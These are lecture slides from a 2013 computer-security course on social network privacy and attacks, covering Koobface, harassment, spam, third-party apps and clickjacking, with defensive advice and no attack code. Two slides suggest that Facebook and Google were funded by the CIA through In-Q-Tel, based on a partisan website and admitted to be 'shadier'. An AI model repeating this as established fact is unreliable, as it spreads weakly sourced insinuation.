1. CSCD 303 Essential Computer Security Spring 2013 Lecture 14 – Social network threats and Attacks Reading: See links - End of Slides

2. Overview Talk about the good and bad of Social Network sites …

3. Information Security is not just for companies

4. Overview Define Social Networking and its benefits Social Networking is an Identity Management System But not always a very good one Has vulnerabilities

5. Social Networking Sites Problems of Trust Research shows that nearly 2/3 of us don’t trust online companies like Facebook Facebook has constantly tweaked its complex security settings over years and despite protests and public outcry it seems situation has not improved Studies show that 68% of Facebook users do not understand social network’s privacy settings According to a 2011 report by MSNBC and Ponemon Institute Internet users feel they have less control over their personal information today than they did 5 years ago http://www.jeffbullas.com/2012/02/23/is-social-media-a- serious-threat-to-your-privacy-infographic/

6. Facebook Origins Where did Facebook come from? Who funded it? In-Q-tel is a venture capital company of the CIA – Central Intelligence Agency In their own words, “ As an information-based agency, the CIA must be at the cutting edge of information technology in order to maintain its competitive edge and provide its customers with intelligence that is both timely and relevant”

7. In-Q-Tel Information The corbett Report describes In-Q-Tel involvement in companies involved in monitoring people The data mining equipment installed in the NSA back door at AT&T, a Narus STA 6400, was developed by a company whose partners were funded by In-Q-Tel News21 reported on an In-Q-Tel investment in CallMiner, a company developing technology for turning recorded telephone conversations into searchable databases Direct investment in Google and Facebook is shadier, but can still be traced back to In-Q-Tel … details below http ://www.corbettreport.com/meet-in-q-tel-the-cias-venture-capital-firm- preview/

8. “Giving people the power to share and make the world more open and connected.”

9. “Twitter is a service for friends, family, and co-workers to communicate and stay connected through the exchange of quick frequent answers to one simple question: What are you doing?”

10. “Your professional network of trusted contacts gives you an advantage in your career, and is one of your most valuable assets. LinkedIn exists to help you make better use of your professional network and help the people you trust in return.”

11. “Delicious is a Social Bookmarking service, which means you can save all your bookmarks online, share them with other people, and see what other people are bookmarking.”

13. Social Networking – Digital Cocktail Party Define my profile (define myself online- interests, skills etc…) Define relations to other profiles (including some access control) Interact with my “Friends” via IM, wall posts, blogs.

14. It’s OK because only my network can see my profile data

15. Low friending thresholds (poor authentication)

16. Only my friends can see my data? Most users don’t realise the size of their audience Only Everyone in the London Network? Only Everyone who pays for a LinkedIn Pro account? Only Everyone in your email address book? Only Social Network employees? Only anyone who’s willing to pay for behavioural advertising? Only Plastic green frogs?

17. It’s OK because I don’t use my real name

18. Data mining tools MyFaceID application will automatically process your photos, find all faces, help you tag them and let you search for similar people.

19. Which fortunately don’t work very well

20. OSN Information Privacy Information posted on OSNs is generally public –Unless you set privacy settings appropriately –“I’ll be on vacation” post plus geolocation invites burglars, i.e., “Please Rob Me” Indiscreet posts can lead to nasty consequences Source: [14] Map from other images public domain

21. OSN Information Privacy Employers, insurers, college admissions officers, et al. already screen applicants using OSNs Recent report from Novarica, research consultancy for finance and insurance industries: “We can now collect information on buying behaviors, geospatial and location information, social media and Internet usage, and more…Our electronic trails have been digitized, formatted, standardized, analyzed and modeled, and are up for sale. As intimidating as this may sound to the individual, it is a great opportunity for businesses to use this data.”

22. OSN Information Privacy Posts that got people fired –Connor Riley: “Cisco just offered me a job! Now I have to weigh the utility of a [big] paycheck against the daily commute to San Jose and hating the work.” –Tania Dickinson: compared her job at New Zealand development agency to “expensive paperweight” –Virgin Atlantic flight attendants who mentioned engines replaced 4 times/year, cabins with cockroaches

23. OSN Information Privacy OSNs don’t exactly safeguard posted info… LinkedIn Additionally, you grant LinkedIn a nonexclusive, irrevocable, worldwide, perpetual, unlimited, assignable, sublicenseable, fully paid up and royalty-free right to us to copy, prepare derivative works of, improve, distribute, publish, remove, retain, add, process, analyze, use and commercialize, in any way now known or in the future discovered, any information you provide, directly or indirectly to LinkedIn, including but not limited to any user generated content, ideas, concepts, techniques or data to the services, you submit to LinkedIn, without any further consent, notice and/or compensation to you or to any third parties. Any information you submit to us is at your own risk of loss. Facebook “You hereby grant Facebook an irrevocable, perpetual, non-exclusive, transferable, fully paid, worldwide license (with the right to sublicense) to (a) use, copy, publish, stream, store, retain, publicly perform or display, transmit, scan, reformat, modify, edit, frame, translate, excerpt, adapt, create derivative works and distribute (through multiple tiers), any User Content you (i) Post on or in connection with the Facebook Service or the promotion thereof subject only to your privacy settings or (ii) enable a user to Post, including by offering a Share Link on your website and (b) to use your name, likeness and image for any purpose, including commercial or advertising, each of (a) and (b) on or in connection with the Facebook Service or the promotion thereof. You may remove your User Content from the Site at any time. If you choose to remove your User Content, the license granted above will automatically expire, however you acknowledge that the Company may retain archived copies of your User Content.”

24. Facebook Privacy Policy Facebook's own Terms of use state: "By posting Member Content to any part of the Web site, you automatically grant, and you represent and warrant that you have the right to grant, to facebook an irrevocable, perpetual, non- exclusive, transferable, fully paid, worldwide license to use, copy, perform, display, reformat, translate, excerpt and distribute such information and content and to prepare derivative works of, or incorpoate into other works, such information and content, and to grant and authorise sublicenses of the foregoing” And in its equally interesting privacy policy: "Facebook may also collect information about you from other sources, such as newspapers, blogs, instant messaging services, and other users of the Facebook service through the operation of the service (eg. photo tags) in order to provide you with more useful information and a more personalised experience. By using Facebook, you are consenting to have your personal data transferred to and processed in the United States."

25. OSN Security Threats/Attacks Malware distribution

26. OSN Malware Distribution Best-known example: Koobface –Worm masquerading as Adobe Flash Player update –Starting in 2009, OSN users enticed to watch “funny video”, then conned into “updating” Flash –Koobface connected infected computers to botnet, served machines ads for fake antivirus software –Estimated 400,000–800,000 bots in 2010 –Facebook outed gang behind Koobface in Jan. 2012, bot server shut down

27. OSN Security Threats/Attacks Cyber harassment, stalking, etc.

28. OSN Stalking, Harassment, etc. Bullies, stalkers, etc. harass people via OSNs –High-profile example: Megan Meier’s suicide 13-year old Meier killed herself after chatting on MySpace with a 16-year-old boy who made degrading remarks The “boy” was a fake account set up by Lori Drew, mother of Meier’s ex-friend Drew found guilty of violating Computer Fraud and Abuse Act in 2008; acquitted in 2009 Most U.S. states have since criminalized cyber harassment, stalking, etc. –OSNs (and their members) have played similar roles in mistreating people

29. OSN Threats Then, there is Social Networking Spam...

30. Social networking spam

33. of social networking users report being hit by spam via the services 57% 70.6% That’s an increase of from a year ago Social networking spam in 2011

34. OSN Malware Distribution Other third-party apps on OSNs like Facebook may contain malware (if not vetted) Which they typically are not

35. OSN Third Party Applications Games, quizzes, “cute” stuff Untested by Facebook – anyone can write one… No Terms and Conditions – either allow or deny Installation gives developers rights to look at your profile and overrides your privacy settings! There’s a sucker born every minute. –P.T. Barnum

36. OSN Threats Shelf-life of your on-line Information is FOREVER!!!

37. OSN Information “Shelf Life” Common sense: it’s very difficult to delete information after it’s been posted online Indiscreet information can adversely affect college admissions, employment, insurance Twitter gave its entire archive to Library of Congress in 2010

38. Click-Jacking and Like-Jacking What is Clickjacking? –Clickjacking occurs when a scam artist or other internet-based bad guy places an invisible button or other user interface element over top of a seemingly innocent web page button or interface element using a transparency layer (which you can't see).

39. Click-Jacking and Like-Jacking Innocent web page might have a button which reads: "Click here to see a video of a fluffy kitty being cute and adorable", But hidden on top of that button is an invisible button that is actually a link to something that you would not otherwise want to click on, such as a button that: – Tricks you into changing privacy settings on your Facebook account – Tricks you into "liking" something you wouldn't normally like – Tricks you into adding yourself as a Twitter follower for someone who doesn't deserve you – Tricks you into enabling something on your computer (such as a microphone or camera)

40. Click-Jacking and Like-Jacking What is Like-Jacking? –"Likejacking" is a Facebook-specific version of an attack called "clickjacking." –The purpose of the attack is to get you to click items on a webpage without your knowledge. –Facebook attackers present a web page that actually has two layers. The back layer is designed with a Facebook "Like" button configured to follow your mouse cursor. The front layer shows whichever lure to be tricked by –No matter where you click on web page, you are actually clicking Facebook Like button and further spreading the spam http://www.sophos.com/en-us/security-news- trends/security- trends/what-is-likejacking.aspx A short video about this http://www.webpronews.com/likejacking-scams-on- facebook-2012-04

41. Defense Measures

42. Personal Defense Measures Common sense measures –Use strong, unique passwords –Provide minimal personal information: avoid entering birthdate, address, etc. –Review privacy settings, set them to “maximum privacy” “Friends of friends” includes far more people than “friends only” –Exercise discretion about posted material: Pictures, videos, etc. Opinions on controversial issues Anything involving coworkers, bosses, classmates, professors Anything related to employer (unless authorized to do so) –Be wary of 3 rd party apps, ads,

43. Personal Defense Measures More advice... –“If it sounds too good to be true, it probably is” –Use browser security tools for protection Anti-phishing filters (IE, Firefox) AdBlock/NoScript/Do Not Track Plus –Personal reputation management Search for yourself online, look at the results… –Extreme cases Cease using OSNs, delete accounts Contact law enforcement re. relentless online harassment

45. Summary Experts suggest, –Internet Security model is completely flawed –Made worse by Web 2.0 –Human nature and trust in our friends and connections will always leave us vulnerable –Try not to put anything too personal and incriminating on Social Networking sites –Or, don't use them at all !!!!

46. References 1. J. Drömer and D. Kollberg, “The Koobface malware gang – exposed!”, 2012, http://nakedsecurity.sophos.com/koobface/ http://nakedsecurity.sophos.com/koobface/ 2. Wikipedia, https://en.wikipedia.org/wiki/Suicide_of_Megan_Meier 3. M. Schwartz, “The Trolls Among Us,” 3 Aug. 2008, https://www.nytimes.com/2008/08/03/ magazine/03trolls-t.html?pagewanted=all 4. M. Raymond, “How Tweet It Is!: Library Acquires Entire Twitter Archive,” 14 Apr. 2010, http://blogs.loc.gov/loc/2010/04/how-tweet-it-is-library-acquires-entire-twitter-archive/ 5. B. Borsboom, B. van Amstel, and F. Groeneveld, “Please Rob Me”, http://pleaserobme.com 6. D. Love, “13 People Who Got Fired for Tweeting,” 16 May 2011, http://www.businessinsider.com/twitter-fired-2011-5?op=1 7. C. Smith and C. Kanalley, “Fired Over Facebook: 13 Posts That Got People Canned,” http://www.huffingtonpost.com/2010/07/26/fired-over-facebook-posts_n_659170.html 8. https://twitter.com/BPglobalPR 9. http://curl.haxx.se/ 10. http://jonathonhill.net/2012-05-18/unshorten-urls-with-php-and-curl/ 11. http://www.securingsocialmedia.com/resources/

47. More References Sophos Report on Social Networking Threats –http://www.sophos.com/en-us/security-news- trends/security-trends/social-networking-security- threats/facebook.aspx

48. End Midterm and Assignment due today